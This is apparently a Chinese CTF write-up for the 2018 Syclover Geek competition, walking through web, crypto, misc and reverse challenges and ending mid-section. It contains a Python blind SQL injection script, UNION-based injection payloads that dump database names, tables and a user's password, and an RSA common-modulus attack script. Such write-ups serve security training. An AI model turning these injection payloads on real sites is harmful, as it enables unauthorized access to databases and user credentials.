<p>一共有四个数据库，一个是默认的，另外三个分别是：simple_message_board、flag、test。</p>
<p>这里有点坑，一开始跑当前库跑了个message出来…还搞了半天id…</p>
<p>最终的盲注脚本：</p>
<pre><code># -*- coding: cp936 -*-

import string
import requests

characters = string.ascii_letters + string.digits + string.punctuation

url = &apos;http://daedalus.kim:9000/index.php?act=search&apos;
c = &apos;&apos;
a=&apos;&apos;
for b in range(1,100):
    for i in characters:
        i = str(a)+i
        exp = &quot;dd%&apos;and/*asd*/LPAD((select/*asd*/flag/*asd*/from/*asd*/flag.flag/*asd*/limit/*asd*/0,1),&quot; + str(b) + &quot;,1)=&apos;&quot; + i + &quot;&apos;#&quot;
        print(exp)
        postdata={&apos;keyword&apos;:exp}
        response = requests.post(url, data=postdata)
        if &apos;Username:ddd&apos; in response.text:
            a=i
            break
print(a)
</code></pre><p>flag：SYC{“%_sq1_injecti0n_%”}</p>
<p><strong>小帅的广告</strong> </p>
<blockquote>
<p>写下你的学习心得和疑惑（what’s up），帅气的小帅将抽取一枚幸运的学弟/学妹兑现招新承诺！</p>
</blockquote>
<p>题目链接：<a href="http://39.106.49.51:11700/index.html" target="_blank" rel="noopener">http://39.106.49.51:11700/index.html</a></p>
<p>随便注册一个账号，抓包，根据题目给的hint：what’s up来查找漏洞。</p>
<p>测试了一番xss未果，接下来测试注入，因为这里是要将数据添加到表中，所以用到的推测是insert。</p>
<p>猜测语句为：</p>
<pre><code>insert into tablename ($username,$password,$lucknum,$whatup) values(&apos;&apos;,&apos;&apos;,&apos;&apos;,&apos;&apos;)
</code></pre><p>闭合一下，在whatup处填写dd’)#这样语句就变为：</p>
<pre><code>insert into tablename ($username,$password,$lucknum,$whatup) values (&apos;&apos;,&apos;&apos;,&apos;&apos;,&apos;d&apos;)#&apos;)
</code></pre><p><img src="http://static.zybuluo.com/Em1or/xv7y1lxpbhzd3q68zgifwxzk/QQ%E6%88%AA%E5%9B%BE20181028230753.png" alt="QQ截图20181028230753.png-101.5kB"></p>
<p>注册成功，登陆账号看看，如果只出现dd后面的都没出现，说明存在注入。</p>
<p><img src="http://static.zybuluo.com/Em1or/nwhinv15bbnuit7r06w9th0l/QQ%E6%88%AA%E5%9B%BE20181028230753.png" alt="QQ截图20181028230753.png-51.1kB"></p>
<p>现在已经确认存在注入，接下来就是构造语句了，由于最后一个字段需要加单引号，所以无法在里面插入sql语句，只能自己再重新添加一行数据。</p>
<p>也就是<code>values(&#39;&#39;,&#39;&#39;,&#39;&#39;,&#39;&#39;),(&#39;&#39;,&#39;&#39;,&#39;&#39;,&#39;&#39;)</code>。</p>
<p><img src="http://static.zybuluo.com/Em1or/z99grq48xql2aq68hdaofhj5/dd.jpg" alt="dd.jpg-120.9kB"></p>
<p>构造成功，提示注册成功，这时候数据库应该已经加了两行数据。</p>
<p>但是这时候问题就来了，我用我新建的账号，死活登陆不进去。。。</p>
<p>之后请教了一下师傅，换了一个点搞，lucknum。</p>
<p>lucknum只允许输入数字，但是好像检测的并不全面，我们可以用十六进制来绕过，等他查询的时候会把十六进制重新转换为字符串。</p>
<p>先测试一下lucknum有没有注入，直接输个单引号看看报错不报错。</p>
<p>对了，这里忘记说了，除了注册的时候会用到insert，登陆的时候返回给用户数据是用的<code>select * from table where username=&#39;&#39; and password=&#39;&#39; and lucknum=&#39;&#39; and whatup =&#39;&#39;</code></p>
<p>所以当我们输入单引号的时候，闭合了lucknum的单引号，后面的语句就会报错，就返不了信息给我们，登陆账号看的时候果然什么信息都没有。</p>
<p><img src="http://static.zybuluo.com/Em1or/g4la1safhe0os6di5jk5si00/QQ%E6%88%AA%E5%9B%BE20181028231927.png" alt="QQ截图20181028231927.png-39.2kB"></p>
<p>爆库：’union select1,2,database()#，因为我们直接把后面注释掉了，所以条件成立，会返回信息。（PS：这里后面测的时候发现也就只有两个查询的字段，也就是说没有and whatup=’’）</p>
<p><img src="http://static.zybuluo.com/Em1or/a7u6x5fg5ijgw1x3i5tkhuml/QQ%E6%88%AA%E5%9B%BE20181028231927.png" alt="QQ截图20181028231927.png-43.8kB"></p>
<p><strong>database:syc10ver_xpy</strong></p>
<p>爆表：’union select 1,2,table_name from information_schema.tables where table_schema=’syc10ver_xpy’#</p>
<p><img src="http://static.zybuluo.com/Em1or/6r45afbhy3nu9y2v4cnbmyku/QQ%E6%88%AA%E5%9B%BE20181028231927.png" alt="QQ截图20181028231927.png-46.5kB"></p>
<p><strong>table:fl4g</strong></p>
<p>爆字段：’union select 1,2,column_name from information_schema.columns where table_name=’f14g’ limit 0,1#</p>
<p><img src="http://static.zybuluo.com/Em1or/b4dtdtww956givj4z416i5nd/QQ%E6%88%AA%E5%9B%BE20181028231927.png" alt="QQ截图20181028231927.png-49kB"></p>
<p><strong>column:easyflag</strong></p>
<p>爆数据：’union select 1,2,easyflag from fl4g#</p>
<p><img src="http://static.zybuluo.com/Em1or/6m8fq0fjnjv4d2zvxfqsa5fj/QQ%E6%88%AA%E5%9B%BE20181028231927.png" alt="QQ截图20181028231927.png-54.9kB"></p>
<p>flag:SYC{syc10ver_b40_jiA0_Ba0_Hu1_bao_f3N_PE1}</p>
<p>拿到flag之后我进user表查了一下我刚刚新添数据的密码：</p>
<pre><code>&apos;union select 1,username,password from user where username=&apos;jksdjkddsjdkjk&apos;#
</code></pre><p><img src="http://static.zybuluo.com/Em1or/q25eapex8s7ben8wnn331sne/ddd.png" alt="ddd.png-6.8kB"></p>
<p>发现的确是123456，但是无论我怎么登陆，都显示登陆失败。最后反馈了一下，个人认为是登陆逻辑问题，所以我感觉whatup这个点是无法使用的。</p>
<h2 id="CODE"><a href="#CODE" class="headerlink" title="CODE"></a><strong>CODE</strong></h2><p><strong>和0xpoker分0day</strong></p>
<p>题目链接：<a href="http://172.104.46.95/Bash_Game%E5%AF%86%E7%A0%81123456.zip" target="_blank" rel="noopener">http://172.104.46.95/Bash_Game密码123456.zip</a></p>
<p>这是一个博弈游戏，算是奥数中最简单的一种…参考链接：<a href="http://www.cnblogs.com/StrayWolf/p/5396427.html" target="_blank" rel="noopener">http://www.cnblogs.com/StrayWolf/p/5396427.html</a></p>
<p><img src="http://static.zybuluo.com/Em1or/6ui60iylrcuhstpquzlr9t19/QQ%E6%88%AA%E5%9B%BE20181005093423.png" alt="QQ截图20181005093423.png-51.7kB"></p>
<p>此题有一个非预期的做法，一直输0，最后的结果还是你取到石子。</p>
<p>flag:SYC{0xpoker=0day}</p>
<p><strong>not reverse</strong></p>
<blockquote>
<p>反正不是逆向。PS：python fez.py &gt; fez.log 链接:<br><a href="https://pan.baidu.com/s/1RPx75PQZGAcW6tE9Y8icDg" target="_blank" rel="noopener">https://pan.baidu.com/s/1RPx75PQZGAcW6tE9Y8icDg</a> 提取码: j4wv</p>
</blockquote>
<p>三叶草的师傅们是真的强…护网杯刚出几天的题，直接就上到geek了，索性直接从网上找了个解密脚本解密。<br>参考链接：<a href="http://www.cnblogs.com/nldyy/p/9800260.html" target="_blank" rel="noopener">http://www.cnblogs.com/nldyy/p/9800260.html</a></p>
<p><img src="http://static.zybuluo.com/Em1or/juu13qqk6ir5icp6xvgi09u9/QQ%E6%88%AA%E5%9B%BE20181005093423.png" alt="QQ截图20181005093423.png-5.9kB"></p>
<p>flag:SYC{y0u_sh0uld_just_THINK_this_Is_not_A_reverse}</p>
<h2 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a><strong>MISC</strong></h2><p><strong>代号为geek的行动第一幕：毒雾初现</strong></p>
<blockquote>
<p>8012年，SYC总部受华夏国授权对一个名叫“毒雾”的黑客组织的攻击进行溯源，在过去几年间该组织对政府、科技、国防、教育等重点单位进行了长期的网络间谍活动，经调研SYC总部决定委派id的为“穿山甲”的组员进行一次反渗透，并将此次计划命名为geek。与此同时太平洋的某个小岛上“穿山甲”收到了SYC总部的电码。</p>
</blockquote>
<p>打开题目链接，是一串morse加密：SYC{–. . . -.- .- -.-. - .. — -. …. .- … -… . –. ..- -. }，解密可得flag。</p>
<p>flag:SYC{GEEKACTIONHASBEGUN}</p>
<p><strong>我相信你正在与我相遇的路上马不停蹄</strong></p>
<p>送分题，关注公众号可得flag。</p>
<p>flag:SYC{WelC0m3_t0_Syc0ver_Try_your_BEst!!!}</p>
<p><strong>萌萌的血小板</strong></p>
<p>题目链接：<a href="https://pan.baidu.com/s/1v1c7LbNjh-c9KmLq14FAgQ" target="_blank" rel="noopener">https://pan.baidu.com/s/1v1c7LbNjh-c9KmLq14FAgQ</a> 密码:hc9k</p>
<p>下载之后用binwalk检测，发现有个压缩包，改为zip，可得到flag.txt。</p>
<blockquote>
<p>哆真阿怯菩諦勝缽室不俱悉孕怯豆皤爍缽槃缽舍竟奢迦竟姪俱伊藐俱多蘇罰苦侄帝諳寫缽寫夷若侄菩羯逝除薩伽豆提呐上罰謹俱尼缽地能冥無恐遠咒薩不姪所</p>
</blockquote>
<p>根据hint可知，这是与佛论禅的加密，去解密即可。</p>
<p>解密链接：<a href="http://www.keyfc.net/bbs/tools/tudoucode.aspx" target="_blank" rel="noopener">http://www.keyfc.net/bbs/tools/tudoucode.aspx</a></p>
<p><img src="http://static.zybuluo.com/Em1or/oxm84c6dgnyhj77gi8620671/QQ%E6%88%AA%E5%9B%BE20181005093423.png" alt="QQ截图20181005093423.png-30.5kB"></p>
<p>flag:SYC{F1ag_1Ssss_th1s!!!}  </p>
<p><strong>小帅圆圆的发际线，你也想要么？</strong></p>
<blockquote>
<p>听说帅姐刚去剃了一个圆圆的发际线，超好看的哟,要不你也去试试~<br><a href="https://pan.baidu.com/s/1X8b-J4KEe8iIQf6Vu6tpLQ" target="_blank" rel="noopener">https://pan.baidu.com/s/1X8b-J4KEe8iIQf6Vu6tpLQ</a> 密码：exq8</p>
</blockquote>
<p>和上题一样，先上binwalk，发现有个压缩包，改为zip，可以得到另外一张图片。</p>
<p><img src="http://static.zybuluo.com/Em1or/lasx7mqi1lmei596o57ntg69/666.jpg" alt="666.jpg-90.9kB"></p>
<p>我之前还傻傻的用图片字符识别工具试图把里面的字符全部识别出来，结果还是会有一些识别不出的地方</p>
<p><img src="http://static.zybuluo.com/Em1or/8f01z8ub182s0xfw77o1iycw/QQ%E5%9B%BE%E7%89%8720181019222151.png" alt="QQ图片20181019222151.png-45.5kB"></p>
<p>结果用nopad++打开图片，发现在末尾有这串字符串，留下菜鸡的泪水…，brainfuck解密即得flag。</p>
<p><img src="http://static.zybuluo.com/Em1or/27b2n2om9x972sud46216twa/QQ%E6%88%AA%E5%9B%BE20181005093423.png" alt="QQ截图20181005093423.png-188.3kB"></p>
<p>flag:SYC{hhhhhh_BBBBBBrainfuuuuck_y0u__got_it!}</p>
<p><strong>陈师傅线代考了满分？</strong></p>
<blockquote>
<p>在陈师傅的线代书上发现了一个奇怪的矩阵，旁边还写着：希尔密码 (1, 2, 1, 2, 1) (1, 1, 1, 2, 1) (2, 2,<br>1, 2, 1) (2, 1, 2, 3, 1) (2, 1, 1, 2, 2)<br>下面一个奇怪的字符串:EGWYQ，你能猜到陈师傅加密了什么吗？</p>
</blockquote>
<p>提示已经很明显了，希尔密码，直接上在线解密，解密链接：<a href="https://www.dcode.fr/hill-cipher" target="_blank" rel="noopener">https://www.dcode.fr/hill-cipher</a></p>
<p>需要翻墙，不然放矩阵的地方不会显示出来。</p>
<p><img src="http://static.zybuluo.com/Em1or/01kgq3yjj4ibvyymta0ukm0d/QQ%E6%88%AA%E5%9B%BE20181005093423.png" alt="QQ截图20181005093423.png-34.9kB"></p>
<p>flag:SYC{SYCYS}</p>
<p><strong>钢铁是怎样炼成的</strong></p>
<blockquote>
<p>题目描述《钢铁是怎样炼成的》里你喜欢哪句名言呀!<br><a href="https://pan.baidu.com/s/1DPuBCY-TRZg9mMQ23pm3Vg" target="_blank" rel="noopener">https://pan.baidu.com/s/1DPuBCY-TRZg9mMQ23pm3Vg</a> 密码:tq5b</p>
</blockquote>
<p>下载了文件，打开压缩包，发现需要密码。</p>
<p><img src="http://static.zybuluo.com/Em1or/qt9zfpvfk40t4am3pcsh8oce/QQ%E6%88%AA%E5%9B%BE20181024123639.png" alt="QQ截图20181024123639.png-82.8kB"></p>
<p>看了一下压缩包内的文件，一个是163264.txt，一个是flag.txt，而我们下载的文件中也有一个是163264.txt，所以猜测是否为明文攻击。</p>
<p>将下载了的163264.txt压缩，查看其CRC32值是否与压缩包内的一至，结果发现是一样的，现在可以确定为zip明文攻击了。</p>
<p><img src="http://static.zybuluo.com/Em1or/s95btfe7vgkh7rlthuekoxpk/QQ%E6%88%AA%E5%9B%BE20181024123639.png" alt="QQ截图20181024123639.png-131.3kB"></p>
<p>我们用ARCHPR对misc2.zip进行明文攻击，即可得出密码（PS：这里有个坑，每个压缩软件的压缩处理不同，所以如果压缩后无法进行明文攻击，请换个压缩软件压缩后重试。）</p>
<p><img src="http://static.zybuluo.com/Em1or/282e58kxu5nfnaw9arunbq90/QQ%E6%88%AA%E5%9B%BE20181024123639.png" alt="QQ截图20181024123639.png-12.5kB"></p>
<p>解压出flag.txt后，发现有一串字符串：<code>4B55595759524446474A4647515933324A5A5447455243324D5A4758555354474A5A5646455A533249354C4755544B484B463545535532464E42544643504A35</code></p>
<p>十六进制转换后得到这么一串字符串：<code>KUYWYRDFGJFGQY32JZTGERC2MZGXUSTGJZVFEZS2I5LGUTKHKF5ESU2FNBTFCPJ5</code></p>
<p>base32解码之后得到：<code>U1lDe2JhczNfbDZfMzJfNjRfZGVjMGQzISEhfQ==</code></p>
<p>很明显的base64了，解码之后得到：SYC{bas3_l6_32_64_dec0d3!!!}</p>
<p>flag:SYC{bas3_l6_32_64_dec0d3!!!}</p>
<p><strong>陈师傅高数也是满分？修改版</strong></p>
<blockquote>
<p>本来要抄陈师傅的高数作业，却在作业本的最后一页了发现了陈师傅的小秘密：</p>
<p>y^2 = x^3 - 4 (mod 1300047890243775110411566068001) G(2, 2) Pb =<br>(909389018886235696038766661889, 46368123338914480456323106832) Cm = {<br>(728655000686462026765334924207, 784703279412824406448137419123),<br>(1093265331080107082393273907159, 659299866410220726142342115664) }</p>
<p>flag格式： SYC{横坐标 纵坐标}</p>
<p>出题人考虑的不够谨慎，flag设置错误，导致c2没有在椭圆曲线上，但并不影响做题，由于有选手已经将题目做出，所以不予改动<br>第一次出题，大家请轻喷</p>
</blockquote>
<p>这道题不会做，网上查了相关资料之后发现看不懂，希望有writeup的师傅能联系我，学习一下…</p>
<p><strong>代号为geek的行动第五幕：损坏的镜像</strong></p>
<pre><code>拿到情报后相关部门快速的进行了搜捕，不料被仍被狡猾的管理员察觉，当定位到管理员住所时已人去楼空只留下了一个被他（她）损坏的镜像文件。
https://pan.baidu.com/s/151Cc5nnK7l_5PgxCX1oiKQ 
提取码：sicr
</code></pre><p>下载之后是一个img镜像，既然说是损坏的，那么我们就用Disk Genius来修复。</p>
<p><img src="http://static.zybuluo.com/Em1or/mc81jj5p41pxnwu3ikw66ohq/QQ%E6%88%AA%E5%9B%BE20181024123639.png" alt="QQ截图20181024123639.png-474kB"></p>
<p>修复之后即可得到两个jpg，打开后就可以看到flag了。</p>
<p>flag:SYC{We1c0me~to~syc2333eee333~}</p>
<p><strong>色差</strong></p>
<blockquote>
<p><a href="https://pan.baidu.com/s/189tinXFrdgX7E-VV3TnMHQ" target="_blank" rel="noopener">https://pan.baidu.com/s/189tinXFrdgX7E-VV3TnMHQ</a> 密码：argu<br>非常简单的misc，常见图片misc题型，别想复杂啦~ hint：密码是拼音，图片名</p>
</blockquote>
<p>已经有提示说是和颜色有关，还提示了和密码有关，猜测为LSB隐写。</p>
<pre><code>python lsb.py extract  misc4.png 3.txt secha（根据提示密码为图片名英文）
</code></pre><p>即可得到flag。</p>
<p>flag:SYC{FIRST_MISC_LSB}</p>
<p><strong>全是flag</strong></p>
<blockquote>
<p><a href="https://pan.baidu.com/s/1C4-Oj2NADyzGYgN45zINOQ" target="_blank" rel="noopener">https://pan.baidu.com/s/1C4-Oj2NADyzGYgN45zINOQ</a> 密码:t44v<br>真的都是flag啊，没骗你们. 注:<br>doc文件里每行代表一个单词(第三行和第四行整体为一个单词)。flag格式为SYC{对应明文}，明文全为字母且为小写，明文里每个单词间用下划线(_)连接</p>
</blockquote>
<p><img src="http://static.zybuluo.com/Em1or/iulo96reo0diqq4s73e2tmxh/QQ%E6%88%AA%E5%9B%BE20181024123639.png" alt="QQ截图20181024123639.png-237.3kB"></p>
<p>打开了之后可以看到有一些图片，一开始我是懵逼的…百度识图之后发现这是一种叫旗语的密码。</p>
<p><img src="http://static.zybuluo.com/Em1or/nymhbedxqnwhan8v4913xvnd/00001.jpg" alt="00001.jpg-33.3kB"></p>
<p>根据这种旗语和英文字母对换表即可解出flag。</p>
<p>flag:SYC{it_is_semaphore}</p>
<p><strong>陈师傅数论也是满分！</strong></p>
<blockquote>
<p>陈师傅一脸鄙夷的看着高数出题人：flag都能弄出偏差的菜鸡，让我来出一道 c1 =<br>0x72a33e8926b16731f8f2839d116cce27eef5765af7ee48198811303fb57d4ef4b8dd393a4d893840291efe16ac64c02e63010e362835a873b60224d3a3583fa223771ee6a30fe6015ea48d601ccacd83efde7b8b189ec02d098L<br>c2 =<br>0x643c4b3c175c2836bcb13edc97e30231afe910fd70010248bcff6d487ec55657d4c74f3483d93ea0723af812e0a61786356d4763c3a4a340bf4c9fdb9c8a20240afee51460f6023a520e5124e014d4875aac281df8a548ed334L</p>
<p><a href="https://pan.baidu.com/s/1Uyt1D3xq_zg6plGH7-aA-A" target="_blank" rel="noopener">https://pan.baidu.com/s/1Uyt1D3xq_zg6plGH7-aA-A</a> 提取码: fedi</p>
</blockquote>
<p>下载文件之后有两个pem文件。</p>
<p><img src="http://static.zybuluo.com/Em1or/5yo6v7k3jvi4spn4ml1hqbed/QQ%E6%88%AA%E5%9B%BE20181024123639.png" alt="QQ截图20181024123639.png-21.1kB"></p>
<p>打开之后发现为c1、c2对应的公钥，由公钥我们可以求出n、e。</p>
<p><img src="http://static.zybuluo.com/Em1or/mj859lkmudicouki65gappa7/QQ%E6%88%AA%E5%9B%BE20181024123639.png" alt="QQ截图20181024123639.png-566.2kB"></p>
<p>求出来之后发现两个公钥得出的e不同，n相同，由此得出为RSA的共模攻击。</p>
<p>参考文章：<a href="https://www.anquanke.com/post/id/84632" target="_blank" rel="noopener">https://www.anquanke.com/post/id/84632</a></p>
<p>根据已有脚本跑出flag：</p>
<pre><code>import gmpy2
from libnum import n2s,s2n
n = 0x00b0bee5e3e9e5a7e8d00b493355c618fc8c7d7d03b82e409951c182f398dee3104580e7ba70d383ae5311475656e8a964d380cb157f48c951adfa65db0b122ca40e42fa709189b719a4f0d746e2f6069baf11cebd650f14b93c977352fd13b1eea6d6e1da775502abff89d3a8b3615fd0db49b88a976bc20568489284e181f6f11e270891c8ef80017bad238e363039a458470f1749101bc29949d3a4f4038d463938851579c7525a69984f15b5667f34209b70eb261136947fa123e549dfff00601883afd936fe411e006e4e93d1a00b0fea541bbfc8c5186cb6220503a94b2413110d640c77ea54ba3220fc8f4cc6ce77151e29b3e06578c478bd1bebe04589ef9a197f6f806db8b3ecd826cad24f5324ccdec6e8fead2c2150068602c8dcdc59402ccac9424b790048ccdd9327068095efa010b7f196c74ba8c37b128f9e1411751633f78b7b9e56f71f77a1b4daad3fc54b5e7ef935d9a72fb176759765522b4bbc02e314d5c06b64d5054b7b096c601236e6ccf45b5e611c805d335dbab0c35d226cc208d8ce4736ba39a0354426fae006c7fe52d5267dcfb9c3884f51fddfdf4a9794bcfe0e1557113749e6c8ef421dba263aff68739ce00ed80fd0022ef92d3488f76deb62bdef7bea6026f22a1d25aa2a92d124414a8021fe0c174b9803e6bb5fad75e186a946a17280770f1243f4387446ccceb2222a965cc30b3929L

e1 = 17

e2 = 65537

fo1 = open(&apos;flag.enc1&apos;, &apos;rb&apos;)
fo2 = open(&apos;flag.enc2&apos;, &apos;rb&apos;)
datafo1 = fo1.read()
message1 = s2n(datafo1)
fo1.close()
datafo2 = fo2.read()
message2 = s2n(datafo2)
fo2.close()
print  message1
print message2
#message1 = 3453520592723443935451151545245025864232388871721682326408915024349804062041976702364728660682912396903968193981131553111537349

#message2 = 5672818026816293344070119332536629619457163570036305296869053532293105379690793386019065754465292867769521736414170803238309535
# s &amp; t
gcd, s, t = gmpy2.gcdext(e1, e2)
if s &lt; 0:
    s = -s
    message1 = gmpy2.invert(message1, n)
if t &lt; 0:
    t = -t
    message2 = gmpy2.invert(message2, n)
plain = gmpy2.powmod(message1, s, n) * gmpy2.powmod(message2, t, n) % n
print plain
print n2s(plain)

# i = 0
# flag = &quot;&quot;
# plain = str(plain)
# while i &lt; len(plain):
#     if plain[i] == &apos;1&apos;:
#         flag += chr(int(plain[i:i + 3]))
#         i += 3
#     else:
#         flag += chr(int(plain[i:i + 2]))
#         i += 2
# print flag
</code></pre><p>即可得出flag。</p>
<p>flag:SYC{cxy_shifu_ttttttttttql}</p>
<p><strong>flag在此，快来拿~！</strong></p>
<blockquote>
<p><a href="https://pan.baidu.com/s/1j940qNdxcSqGNqol7UaqoQ" target="_blank" rel="noopener">https://pan.baidu.com/s/1j940qNdxcSqGNqol7UaqoQ</a> 密码：2lds</p>
</blockquote>
<p>下载之后是一个压缩包，打开提示文件损坏，用010 Editor打开看看。</p>
<p><img src="http://static.zybuluo.com/Em1or/dr4jmak9gczs63qox1r1ymec/QQ%E6%88%AA%E5%9B%BE20181024123639.png" alt="QQ截图20181024123639.png-207.1kB"></p>
<p>可以看到是jpg的标识头。把后缀改为jpg之后，得到一张不完整的二维码图片。</p>
<p><img src="http://static.zybuluo.com/Em1or/xyvqltz0dkngohqh5q7md4b7/QQ%E6%88%AA%E5%9B%BE20181024123639.png" alt="QQ截图20181024123639.png-670.2kB"></p>
<p>与正常的二维码对比，发现少了四个角，补齐即可。</p>
<p><img src="http://static.zybuluo.com/Em1or/ccfav7m7oyyd5hptwxv4lt9o/sd.jpg" alt="sd.jpg-49.2kB"></p>
<p>支付宝扫描之后得出一串字符串:cIpZ1Sp3GMqxYNJxdQpxhPr7ZLqNpPattLrFcMKtTSKxpLrFcOKtfTE++</p>
<p>gb2312解码之后得到flag：</p>
<p><img src="http://static.zybuluo.com/Em1or/lsr1hyjuzml2h9pa9w9wq8w6/QQ%E6%88%AA%E5%9B%BE20181024123639.png" alt="QQ截图20181024123639.png-27.7kB"></p>
<p>flag:SYC{QRcode_is_more_funny_than_you_think}</p>
<h2 id="RE"><a href="#RE" class="headerlink" title="RE"></a><strong>RE</strong></h2><p><strong>0xpoker的QQ</strong></p>
<blockquote>
<p>按下0xpoker的QQ即可得到flag 链接:<br><a href="https://pan.baidu.com/s/1ILS6E162HsXuH_VlFspnxg" target="_blank" rel="noopener">https://pan.baidu.com/s/1ILS6E162HsXuH_VlFspnxg</a> 提取码: ed8m</p>
</blockquote>
<p>直接反编译dex→jar，打开之后得到源码，在Layout.class找到可疑base64字符串，解码之后得到flag。</p>
<p><img src="http://static.zybuluo.com/Em1or/51f9g6gupefi4ix3i6btbtbo/QQ%E6%88%AA%E5%9B%BE20181029133512.png" alt="QQ截图20181029133512.png-291kB"></p>
<p>flag：SYC{Ea2y_ANdr0id_R3!}</p>
<p><strong>可能没有你想的那么难</strong> </p>
<blockquote>
<p>什么工具不重要，做得出来最重要 <a href="https://pan.baidu.com/s/1SAdcLshlihkIZ1vZrOG_4Q" target="_blank" rel="noopener">https://pan.baidu.com/s/1SAdcLshlihkIZ1vZrOG_4Q</a> 提取码: v1wy</p>
</blockquote>
<p>下载之后直接010Editor打开搜索flag关键字符syc即可得到flag。</p>
<p><img src="http://static.zybuluo.com/Em1or/4luj80ckodm3v6p8up90mw24/QQ%E6%88%AA%E5%9B%BE20181029133512.png" alt="QQ截图20181029133512.png-124.7kB"></p>
<p>flag：SYC{y0u_kNow_lt_easy}</p>
<p><strong>换个样子你还认识吗</strong> </p>
<blockquote>
<p>会很难吗 <a href="https://pan.baidu.com/s/17oxGuNxabgqxPt17QtaFMQ" target="_blank" rel="noopener">https://pan.baidu.com/s/17oxGuNxabgqxPt17QtaFMQ</a> 提取码: eack</p>
</blockquote>
<p><img src="http://static.zybuluo.com/Em1or/i81hixej5blh4xxslx9g4d7o/QQ%E6%88%AA%E5%9B%BE20181029133512.png" alt="QQ截图20181029133512.png-117.4kB"></p>
<p>进入main函数:</p>
<pre><code>if ( !memcmp(&amp;v11, arr, 0x14u) )
</code></pre><p>百度了一下memcmp函数，发现是比较函数，这里加了个感叹号，相当于否定。</p>
<p>也就是说只要两个字符一样就会返回true。</p>
<p>而前面看到了一个假flag：</p>
<pre><code>.data:00404004 _arr            db &apos;SYC{this_is_flag_gg}&apos;,0 ; DATA XREF: _main+F4o
</code></pre><p>根据条件。异或后得出flag。</p>
<p>flag：SYC{heRe_is_f14g_gg}</p>
<p><strong>Fuze.vs.Zombie</strong> </p>
<blockquote>
<p>要杀死1000只姜丝才能逃出生天哦 <a href="https://pan.baidu.com/s/1chy0m---I5JZCHJOHFH70Q" target="_blank" rel="noopener">https://pan.baidu.com/s/1chy0m---I5JZCHJOHFH70Q</a> 提取码:<br>nsiq</p>
</blockquote>
<p>这个我就不下载来复现了，小时候玩过植物大战僵尸的应该都会。。</p>
<p>下个CE修改器，先杀一只僵尸，杀死之后会得到10分，我们需要一万分，所以杀死一千只僵尸就可以了。</p>
<p>先杀死一只，CE搜索10，这时候会出现很多，再杀死一只，变为20分之后CE再次搜索20，就只剩下几个了，全部修改为10000即可得到flag。</p>
<p>flag：SYC{ZoMBIE_KILLER!}</p>
<p><strong>EasyDotNet</strong> </p>
<blockquote>
<p>你知道什么是.Net程序吗，不知道的话就去了解下吧~<br><a href="https://pan.baidu.com/s/1TEWRYlBmz1KmdErlh8wdSw" target="_blank" rel="noopener">https://pan.baidu.com/s/1TEWRYlBmz1KmdErlh8wdSw</a> 提取码: 24wn</p>
</blockquote>
<p><img src="http://static.zybuluo.com/Em1or/vkpfm5sr33ckcdcldjtkunjk/QQ%E6%88%AA%E5%9B%BE20181029133512.png" alt="QQ截图20181029133512.png-61.1kB"></p>
<p>直接载入ida即可看到flag。</p>
<p>flag：SYC{easy_dot_net}</p>
<p><strong>zoniony的QQ</strong> </p>
<blockquote>
<p>输入0xzoniony的QQ和他的密码即可得到flag.<br><a href="https://pan.baidu.com/s/1Gf4naOnprzxdV4D8mZ4Krw" target="_blank" rel="noopener">https://pan.baidu.com/s/1Gf4naOnprzxdV4D8mZ4Krw</a> 提取码: tvw2</p>
</blockquote>
<p>代码看不懂，看了一下apk加载的文件，直接在so文件里找到flag。</p>
<p><img src="http://static.zybuluo.com/Em1or/w1epjzn6dzur2qv8h6hhbfbb/QQ%E6%88%AA%E5%9B%BE20181029133512.png" alt="QQ截图20181029133512.png-97.6kB"></p>
<p>flag：SYC{E4sy_JN1_R3}</p>
<p><strong>rm -rf /</strong> </p>
<blockquote>
<p>0xpoker最喜欢干的事情就是删库到跑路 某天，0xpoker给你被损坏的ELF文件，就跑去打王者荣耀去了 你一看就知道是魔数出问题了<br>请你修复ELF后再帮他删库 链接: <a href="https://pan.baidu.com/s/1fVwahdMikZ2s1hjUWBX68g" target="_blank" rel="noopener">https://pan.baidu.com/s/1fVwahdMikZ2s1hjUWBX68g</a> 提取码:j2gp</p>
</blockquote>
<p>还是一样丢到ida看main函数。</p>
<p><img src="http://static.zybuluo.com/Em1or/8rb8964ps5ddgx7lrz02gux1/QQ%E6%88%AA%E5%9B%BE20181029133512.png" alt="QQ截图20181029133512.png-112.8kB"></p>
<p>跟进函数：sub_400E3D</p>
<p><img src="http://static.zybuluo.com/Em1or/a4vxyk3x1omiqap1qzbevpnu/QQ%E6%88%AA%E5%9B%BE20181029133512.png" alt="QQ截图20181029133512.png-93.1kB"></p>
<p>看大可疑base64，在线解密一下。</p>
<p>解密得到flag。</p>
<p>flag：SYC{rm_-rf_y0u_are_crazy}</p>
<p><strong>geek no gdb</strong></p>
<blockquote>
<p>0xpoker因为你之前删库还在打着王者就被抓进局子 不老实的0xpoker得到狱警的密码锁程序<br>但0xpoker只会windows解不开Linux下的密码锁 于是求助会用gdb你 PS：linux是啥，装个虚拟机？<br><a href="https://pan.baidu.com/s/1Ol0g5bdFlkCkmWB3QFN9wA" target="_blank" rel="noopener">https://pan.baidu.com/s/1Ol0g5bdFlkCkmWB3QFN9wA</a> 提取码: 7ag8</p>
</blockquote>
<p>先丢进ida里,看看main函数。</p>
<p><img src="http://static.zybuluo.com/Em1or/ky1bgycpyjqwchvbjbqen2fj/QQ%E6%88%AA%E5%9B%BE20181030203157.png" alt="QQ截图20181030203157.png-86.4kB"></p>
<p>跟进sub_400716函数，发现报错，看不了伪代码。</p>
<p><img src="http://static.zybuluo.com/Em1or/ny6b0vi01dt70xmki4zr89c9/QQ%E6%88%AA%E5%9B%BE20181030203157.png" alt="QQ截图20181030203157.png-12.7kB"></p>
<p>我们从Options→General勾选一下stack pointer。</p>
<p><img src="http://static.zybuluo.com/Em1or/luyswskteff68qtsa3umz94r/QQ%E6%88%AA%E5%9B%BE20181030203157.png" alt="QQ截图20181030203157.png-107.3kB"></p>
<p>勾选后所有的反汇编代码将会显示出IDA模拟出来栈地址的值。</p>
<p><img src="http://static.zybuluo.com/Em1or/r2vaxr2fbninkx6wmm4lk9w0/QQ%E6%88%AA%E5%9B%BE20181030203157.png" alt="QQ截图20181030203157.png-1.4kB"></p>
<p>我们可以看到802处sp的值是-4，这里修改一下。</p>
<p>参考文章：<a href="https://www.secpulse.com/archives/74715.html" target="_blank" rel="noopener">https://www.secpulse.com/archives/74715.html</a></p>
<p>修改完毕之后就可以看到sub_400716的伪代码了。</p>
